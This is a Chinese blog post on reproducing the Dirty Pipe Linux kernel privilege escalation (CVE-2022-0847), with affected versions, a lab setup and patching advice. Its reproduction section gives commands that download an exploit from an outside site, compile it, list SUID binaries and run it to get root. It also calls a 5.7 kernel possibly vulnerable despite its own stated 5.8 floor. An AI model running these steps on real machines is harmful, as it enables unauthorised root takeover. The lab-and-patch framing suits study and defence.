TOC

0x001 漏洞描述?

CVE-2022-0847是自 5.8 以来 Linux 内核中的一个漏洞,攻击者利用该漏洞可以覆盖任意只读文件中的数据。这样将普通的权限提升至root权限,因为非特权进程可以将代码注入到根进程。

0x002 受影响版本

5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

0x003 漏洞靶场搭建

kali主机可以测试
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
符合即可

  • Ubuntu 16.04 或 18.04(推荐)
  • kali2022或者更低版本

0x004 复现步骤

1.漏洞发现

可以看到系统内核 5.7 ,说明可能存在脏管道漏洞

uname -srm

2.漏洞利用

wget https://haxx.in/files/dirtypipez.c    //下载
gcc -o dirtypipez dirtypipez.c    //编译
find / -user root -perm -4000 -print 2>/dev/null   /探针具有 SUID 权限的可执行文件,然后在利用提权

探针出很多个suid可执行文件,随意选择一个即可

./dirtypipez /usr/bin/su
id

0x005 修复建议

更新升级 Linux 内核到以下安全版本:

  • Linux 内核 >= 5.16.11
  • Linux 内核 >= 5.15.25
  • Linux 内核 >= 5.10.102

0x006 总结

攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root

这个漏洞作者将其命名为了 Dirty Pipe(脏管道),一看到这名字讲道理就让人想到了 Dirty Cow(脏牛),这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。

Dirty Pipe脏管道提权漏洞复现(CVE-2022-0847)相关推荐

  1. Dirty Pipe linux内核提权漏洞分析(CVE-2022-0847)

    漏洞原理 Pipe机制 本质上来说,管道(pipe)就是一种进程间通信的手段,让两个进程可以通过pipe 发送和接收数据. Page Cache机制 磁盘的IO读写速度是很慢的,所以一般当我们访问一个 ...

  2. [漏洞分析] CVE-2022-0847 Dirty Pipe linux内核提权分析

    CVE-2022-0847 Dirty Pipe linux内核提权分析 文章目录 CVE-2022-0847 Dirty Pipe linux内核提权分析 漏洞简介 环境搭建 漏洞原理 漏洞发生点 ...

  3. Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328

    Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...

  4. 脏牛Linux本地提权漏洞复现(CVE2016-5195)

    漏洞介绍: 脏牛漏洞(CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响.恶意攻击者可以轻易绕 ...

  5. 【CVE-2021-4043】Linux本地提权漏洞复现

    实验步骤 文章目录 实验步骤 CVE-2021-4043 Linux本地提权漏洞 实验背景 实验环境 漏洞复现 构造payload 用gcc编译后上传到阿里云 执行payload 漏洞修复 CVE-2 ...

  6. 脏牛Linux本地提权漏洞复现(CVE-2016-5195、Linux、Android、提权)

    漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞 ...

  7. DirtyPipe(脏管道)提权

    DirtyPipe提权 CVE-2022-0847 漏洞详情 新管道缓冲区结构的"flags"成员在 Linux 内核中的 copy_page_to_iter_pipe 和 pus ...

  8. Android提权root漏洞,【转】结合init源码剖析android root提权漏洞(CVE

    这篇文章是上一篇博客的后续分析,主要介绍向init进程发送热拔插信息后init进程的处理流程 首先我们来了解一个数据结构,uevent,如下 struct uevent { const char *a ...

  9. CVE-2021-3560-POLKIT本地提权漏洞复现

    Polkit 0.105-26 0.117-2 - Local Privilege Escalation Exploit! Tested on Ubuntu20.10 Linux localhost ...

最新文章

  1. 如何在自定义指令中获取评估属性
  2. python安装步骤电脑版-超详细的小白python3.X安装教程|Python安装
  3. SAP ERP系统业务优化之采购订单追踪
  4. 撰写第三周课程总结及实验报告(一)
  5. JAVA 排序工具类
  6. 微软正在用实际行动告诉你: 拥抱开源,微软是认真的
  7. HTML特殊符号/特殊字符
  8. centos 7.6安装java_Hadoop的安装
  9. delphi7 获取dll的类_跟我学Java内存管理----JMM精华终章(类加载器)
  10. windows7系统电脑管理员权限怎么更改
  11. bootsrap 外边距_Bootstrap 网格系统布局详解
  12. 嵌入式系统——曼彻斯特编码
  13. 进程管理利器Supervisor--入门简介
  14. SHELL递归遍历文件夹下所有文件
  15. 如何用excel计算断色断码_各位小姐姐、小哥哥都是怎么用Excel计算断码率的指标?...
  16. 新手网管的升级之路 一
  17. 人到中年:“无爱、无话、无性”
  18. 怎么登陆163邮箱?163的邮箱有哪些实用技巧?
  19. Tensorboard远程连接
  20. Mysql迁移到GaussDb_GaussDB T 使用DUMP/LOAD导出导入迁移备份数据

热门文章

  1. Rook-Ceph mon时钟误差的问题解决
  2. 使用ModbusPoll与Modbus Slave进行TCP连接和串口连接
  3. Excel获取Sheet表名
  4. BarTender.Application COM 多次调用引发后台进程数不断增加的问题
  5. 2020T电梯修理模拟考试及T电梯修理实操考试视频
  6. 有了art-template,如有神助
  7. 巨杉2017行业认可盘点
  8. Node.js Web 框架再进化 - 面向前端与未来标准
  9. 希沃白板5快捷键_【希沃白板5官方下载】希沃白板5 v5.1.7 电脑版-开心电玩
  10. Lifeform——站在3D虚拟数字身份与元宇宙结合的风口之上